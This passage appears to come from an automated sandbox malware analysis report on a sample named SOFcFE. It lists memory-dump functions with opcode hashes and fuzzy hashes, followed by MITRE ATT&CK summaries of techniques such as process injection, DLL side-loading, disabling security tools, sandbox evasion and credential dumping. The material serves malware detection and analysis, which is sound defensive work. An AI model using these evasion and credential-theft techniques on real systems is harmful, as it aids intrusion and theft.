Instruction Fuzzy Hash: 297149347006058FCF16DF69C898AAE7BE6BF89204B150AA9F812DB3B1DB71DD41CB50

Function 02C3F5AF Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe693d7214e5ea3b70428cd84db2fc9bf685ae9a7f3eb1a8712fa4b3dda91ea
Instruction ID: b67649a135addebb24cff476df1c887ebebd0e7dae510f565d91910ea7e4e754
Opcode Fuzzy Hash: 8fe693d7214e5ea3b70428cd84db2fc9bf685ae9a7f3eb1a8712fa4b3dda91ea
Instruction Fuzzy Hash: DD61FE34D00318DFDB25DFA5D988BAEBBB2FF89301F608529D805AB294DB356946CF40

Function 02C39C30 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c416fbedeac47167c5d1961c434fb9eb6db784ec6a900e3b5fe5e327346a3229
Instruction ID: b8f15779493bc2e58b60802d86363099f7d23c7bb0cf6f0d450a00737c49cecc
Opcode Fuzzy Hash: c416fbedeac47167c5d1961c434fb9eb6db784ec6a900e3b5fe5e327346a3229
Instruction Fuzzy Hash: 2B51A1307002059FDB01DF69D884B6ABBEAEFC8310F148866E949CB355DBB1DD02CBA1

Function 02C3D869 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeed3b50586d186ebe6d9bfa5c680838999799b2bfbcdaa1b28793b33ebc4c74
Instruction ID: 2aeb1d691f608f2649de0f7f118cb34c0c39158223072247970739ffadeabd5a
Opcode Fuzzy Hash: aeed3b50586d186ebe6d9bfa5c680838999799b2bfbcdaa1b28793b33ebc4c74
Instruction Fuzzy Hash: 9B518474E11208DFDB54DFAAD98499DBBF2FF89300F208169E819AB365DB31A905CF50

Function 02C341A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 221c690d51f474ca7db0b35fe25cd05320fa95064be8abad70f0a6bc4fc2f037
Instruction ID: f4b7ab32ddd3601546c08b4725934d9ada1cb1316c440f4747a4e60297a4a2f6
Opcode Fuzzy Hash: 221c690d51f474ca7db0b35fe25cd05320fa95064be8abad70f0a6bc4fc2f037
Instruction Fuzzy Hash: 86519775E01208DFCB59DFA9D58499DBBF2FF89310B208469E819AB324DB31AC42CF50

Function 02C3AEBA Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81b9e087d0bfdbeb7d4a48ab3c60e4316e92797c3b027a3e92efa7579f6d1073
Instruction ID: 0652b71da22feb6f44e4e9039ba1101346cbd83861c912a2e7b83293357af5b4
Opcode Fuzzy Hash: 81b9e087d0bfdbeb7d4a48ab3c60e4316e92797c3b027a3e92efa7579f6d1073
Instruction Fuzzy Hash: 4641D272B002049FD705AB75E858BAE7BB2BFCC215F144829E516D7390DF319D12CBA0

Function 02C3A303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1e46191ddae419da5f762ea289f0207767df596986998fe2374ed8ba21e3056
Instruction ID: 56644d970e8814387943d181d8e158fec1d90bc46316906b7a57eec48b5c09be
Opcode Fuzzy Hash: d1e46191ddae419da5f762ea289f0207767df596986998fe2374ed8ba21e3056
Instruction Fuzzy Hash: 4041B631A00249DFCF16CFA4C848B9DBBB1FF89324F048955E999AB361D335E964CB60

Function 02C36FC8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e91d082f2d43016990e8571e6abdc5be56ffd5aceb53f66dd4a0fcd1baf097d5
Instruction ID: 74b1e1943742d918bbb227df6708b11a5b506e868f42d5bc841aadfbe076ad28
Opcode Fuzzy Hash: e91d082f2d43016990e8571e6abdc5be56ffd5aceb53f66dd4a0fcd1baf097d5
Instruction Fuzzy Hash: DB41E371A04248DFCB12CF64C804B6ABBB6EB84314F04886AE815DB352D775DE59CFA1

Function 02C33CC0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86fc81e213d3f2eaaa3aafb46ceb74898342c3233678545dec844f5df3df1947
Instruction ID: 70e72158a361b9a4d59360eb2dbc7a0607ef2393e1f8164ea50c044cd57a3bfe
Opcode Fuzzy Hash: 86fc81e213d3f2eaaa3aafb46ceb74898342c3233678545dec844f5df3df1947
Instruction Fuzzy Hash: E1310731B143A487DF294666989437EA6AAABC4311F14497AE807C7380EB75CD4587E1

Function 02C35658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698ae8f824245e1c5eb5f510169d081ca0d6d8e42bba4ae0ce733da6364d56f8
Instruction ID: fa8dfaf3580c96d3782093d58a240625faee7ddae943f8e5d5e408ce4b1bab76
Opcode Fuzzy Hash: 698ae8f824245e1c5eb5f510169d081ca0d6d8e42bba4ae0ce733da6364d56f8
Instruction Fuzzy Hash: 42317A3160520AEFCB069F64D858ABF3BB2EB88254F404825F915D7394CB35CE21DBA1

Function 02C38EF8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2345fec3df06677dce2d179495b337e97d32937d8982c4ae7a4c0a3689136efe
Instruction ID: aaa7052bbf42e254f9133c5f2c9b7e44944231fbfd36fecaa2957728f5ada3d8
Opcode Fuzzy Hash: 2345fec3df06677dce2d179495b337e97d32937d8982c4ae7a4c0a3689136efe
Instruction Fuzzy Hash: D0318F307042118FDB269B6AD95473E7B67BFC8710B240E6AF016CB396EB2ADD40C795

Function 02C38380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f03801e05c494c5c975a7ce115ac7e12ef0b1f7b34da908a07f1bbaf21fd008
Instruction ID: 6929381b7562279fe2f0e5690f4433ced70d9901bf80570583668e8daa75d5f9
Opcode Fuzzy Hash: 0f03801e05c494c5c975a7ce115ac7e12ef0b1f7b34da908a07f1bbaf21fd008
Instruction Fuzzy Hash: 6B21A1303042008BDB26566A857877F7697AFC4769F148A39F406CBB98EF76CC82D791

Function 02C362F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb12c5047e8936218aca9257ef374aa88e1f9d002642d3195f0884cb9c73d506
Instruction ID: 6c6ebf77b6d9ecc0e0fb1206f153da5c7a97dfba9c37b2414aa169020c74264a
Opcode Fuzzy Hash: fb12c5047e8936218aca9257ef374aa88e1f9d002642d3195f0884cb9c73d506
Instruction Fuzzy Hash: 262168357046119FC71A9B29C46893FB7A6FFC9755724896AE81ACB394CF30CC02CB90

Function 02C328F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b176d551ed55311881d3eeaf57347c4adaa70bc8980de8b3f3b35bb5e1d375bb
Instruction ID: 1c4af74d7fa2ba05354b30a6d2927001e508fab83b8234d7c97993a6e74ef9b5
Opcode Fuzzy Hash: b176d551ed55311881d3eeaf57347c4adaa70bc8980de8b3f3b35bb5e1d375bb
Instruction Fuzzy Hash: 31216235E00318AFCF15DB38D440AAE7BA5EB9D360B60C519D81A9B354DB31EE46CBD1

Function 0139D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762333006.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_139d000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e458dc77b4edcf1d15f88946b50a52698419305ff9bbbc96978827dc4335f38b
Instruction ID: 6cc8d803f8b3699eb787344e1ad7097ca3ed7afabc0db1d26daa7459c7bb0f5d
Opcode Fuzzy Hash: e458dc77b4edcf1d15f88946b50a52698419305ff9bbbc96978827dc4335f38b
Instruction Fuzzy Hash: FC2100B16042049FDF15DF68D9C5B26BB65EB84318F20C5ADE8490F342C736D847CA62

Function 02C35649 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0444f132195239440c607b82d27bbc06e014d5da7aec1a2e79b6faf60981d7e1
Instruction ID: 10eb2ce803492581d781512ab1ae70418341950e28746003bea929439def9f51
Opcode Fuzzy Hash: 0444f132195239440c607b82d27bbc06e014d5da7aec1a2e79b6faf60981d7e1
Instruction Fuzzy Hash: B721D232605109DFDB16AF68D858BBF3BB2EB88354F004829E805DB344CB35CE65DBA1

Function 02C3AEF0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c6ae9616cd18aba37f10bd0d61e79e0f05562ce50027f8aeae40604f451d9b
Instruction ID: d66654509bf65fd141fa28a43b44893e52fc2615fdae50be52fc57a5ad244259
Opcode Fuzzy Hash: 43c6ae9616cd18aba37f10bd0d61e79e0f05562ce50027f8aeae40604f451d9b
Instruction Fuzzy Hash: C4217272B401089BCB14DF58D888BEEBBB5FB8C314F144826E916E7350DB719D20CBA0

Function 02C39761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7a4ac31fd08370e757e60eabeecf8e7684c89f533850400b2ee407c3fe63665
Instruction ID: 701fc0ee0a515054a11c1cf8e479c62ce08cf8d7c10d87f60521282a19c5f8cc
Opcode Fuzzy Hash: d7a4ac31fd08370e757e60eabeecf8e7684c89f533850400b2ee407c3fe63665
Instruction Fuzzy Hash: 26218B30E05248DFDB05DFA5E554AEEBFB6AF89204F248469E401E6390DB34DA41DB60

Function 02C3F4D0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2ef59e3d7f721c87338caf4180b2ab478f760a61322751a8488c943c1b437f
Instruction ID: 190760123d7598a92cd802a3dfc4d3d42ac846f9f2b1f42b3b77e5963ac5f65b
Opcode Fuzzy Hash: cc2ef59e3d7f721c87338caf4180b2ab478f760a61322751a8488c943c1b437f
Instruction Fuzzy Hash: FE214DB5D002099FEB11EFA8D94079EBFB2FF45301F1085AAC0599B359EB315A069B81

Function 02C36300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 511f124497403dbebdae3fd39030be4409c16402a4bc56a5af743eebf7996a5f
Instruction ID: 3890f02ee2e6b427fd6dfd7f8b3f0aed6e793c766e6e4ba5ab97f9990a37b0b1
Opcode Fuzzy Hash: 511f124497403dbebdae3fd39030be4409c16402a4bc56a5af743eebf7996a5f
Instruction Fuzzy Hash: BF112B35704611AFC7165B2AC46893EB7AAFFC57653254879E81ADB350CF31DC02CB94

Function 02C327F0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47a11758b8fa0cf9d240ed38f7521b611f7cf15243886289e0ed2b96b1a9b78d
Instruction ID: fffcaaa0d994214071d73c15fc33dce3fb5a9b7f599c369c055e1233bc47a7cd
Opcode Fuzzy Hash: 47a11758b8fa0cf9d240ed38f7521b611f7cf15243886289e0ed2b96b1a9b78d
Instruction Fuzzy Hash: 7021C074D052098FCB05EFA9D9595EEBBF4FF0A300F10556AD805B3214EB311A96CFA1

Function 02C3F4E0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c435d4a17e43af59c0dba1d8c0f3e49203745c0daedbf444dd18c97c6ffbedd2
Instruction ID: ed9bf1cc87658ce439dabc382d9f07f71bbf2987fe24dd61eada51ca8f696c55
Opcode Fuzzy Hash: c435d4a17e43af59c0dba1d8c0f3e49203745c0daedbf444dd18c97c6ffbedd2
Instruction Fuzzy Hash: 16112E75D0020DDFDB15EFA8D940B9EBBF6FB44304F1085AAC0199B358EB705A069F81

Function 0139D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762333006.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_139d000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: d086d6d844d322e6bb28a59729841cc9848d3586a99be4c9efcee4f30c879854
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: F711BE75504244CFCB16CF58C5C5B16BF62FB44318F24C6A9D8494B252C33AD44ACF61

Function 02C35E98 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f62b2e6b97f7f84c755c1d5a7cf55e7d6a477d788e9bac9c709e2117139571
Instruction ID: 098bd24555d387c82eecf6ddd0a0f70f0139a64ab0f1df137199a4a285671ecf
Opcode Fuzzy Hash: e6f62b2e6b97f7f84c755c1d5a7cf55e7d6a477d788e9bac9c709e2117139571
Instruction Fuzzy Hash: B301D432B001156BCB02DEA99844BAF3BEAEBCC294F14841AF505D7344CA768D219BA0

Function 02C3ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9eb61529c6de1c17db957762d349eb211fb987afc54f1a07c0dac8a5ca94ad5
Instruction ID: cf201e9f70f50bdf8dfb8f210e9243570486d0738efb32db74176ca54dd476d2
Opcode Fuzzy Hash: f9eb61529c6de1c17db957762d349eb211fb987afc54f1a07c0dac8a5ca94ad5
Instruction Fuzzy Hash: 12F0B131740A104F87175A2EE45876A77DEFFC8A593154479E546C7361DF21CD13C790

Function 02C3EB79 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 740e24196daf6e800622c035ec430c6443cc29499689802fbc8a727082d9caed
Instruction ID: c121c5cd53dc93fe797621b21202a5045985569eaf6d7394824f8fa52c77de7e
Opcode Fuzzy Hash: 740e24196daf6e800622c035ec430c6443cc29499689802fbc8a727082d9caed
Instruction Fuzzy Hash: A4019A79D0030AEFCB02DFA8E884AAEBBB5FF4A304F004166D910A3358D7359A41DF90

Function 02C328A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8960026af1f053c4a8829e55094031742c8a26c75bf6bcac54c35457800437e
Instruction ID: 090cb0fbad2898296dd8d7c5e5e4b46acdd9fec895f2cd0b22517b8bb46cbfa9
Opcode Fuzzy Hash: d8960026af1f053c4a8829e55094031742c8a26c75bf6bcac54c35457800437e
Instruction Fuzzy Hash: E7E02031D543558BC701D7F49C040EEFF34ADC6211758855BC46137090EB30265AC361

Function 02C328B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0ec2165315b4f00db62b2f8b2b64fcd663d8743660aac9695debed2053f04c
Instruction ID: 37566068d83185f0e4326393310b650fe23c4ddc421d9b9b98e4168d4d22c869
Opcode Fuzzy Hash: cb0ec2165315b4f00db62b2f8b2b64fcd663d8743660aac9695debed2053f04c
Instruction Fuzzy Hash: 7AD05B31D2032A57CB10E7A5DC048DFFB38EED6321B904626D52437144FB706659C6E1

Function 02C36739 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 199c34dd2f748df5ced9bb78a837a65115b6d238d1f5db59c0ead7f89a762253
Instruction ID: f7b27170948a596a7e5d88d70ce47b5c36fe08bb5b54626c100f6fa37da7f81d
Opcode Fuzzy Hash: 199c34dd2f748df5ced9bb78a837a65115b6d238d1f5db59c0ead7f89a762253
Instruction Fuzzy Hash: 81D05E328443564FD741EB78F849A153F69A780114F048711D1058A60EDFB4A8159B61

Function 02C3AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f79c34b2d1f951454c356ec3e1be9a0f787a0113888f3feff579d107548f81
Instruction ID: 0b24d9589d77ddbac15e74e469b960dc4c326f08d405719d2cd87c7b80062da2
Opcode Fuzzy Hash: 55f79c34b2d1f951454c356ec3e1be9a0f787a0113888f3feff579d107548f81
Instruction Fuzzy Hash: 1DD0673BB400089FCB049F98E8449DDF776FB98221B448517E916E7260C6319965DB64

Function 02C36748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a931e4600d05097953b2ff7c1419d85c16c03ee6822d26c48e5fc76af00ea5
Instruction ID: 7dfc86bef9fb012bb08058ab41667ae62ee9ede0bdedca47ff54ae02bc07ff4d
Opcode Fuzzy Hash: e3a931e4600d05097953b2ff7c1419d85c16c03ee6822d26c48e5fc76af00ea5
Instruction Fuzzy Hash: 9AC080358043254FD681F775FC54955372EA7C01157408711D0054D34DDEB47C4A57A5

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
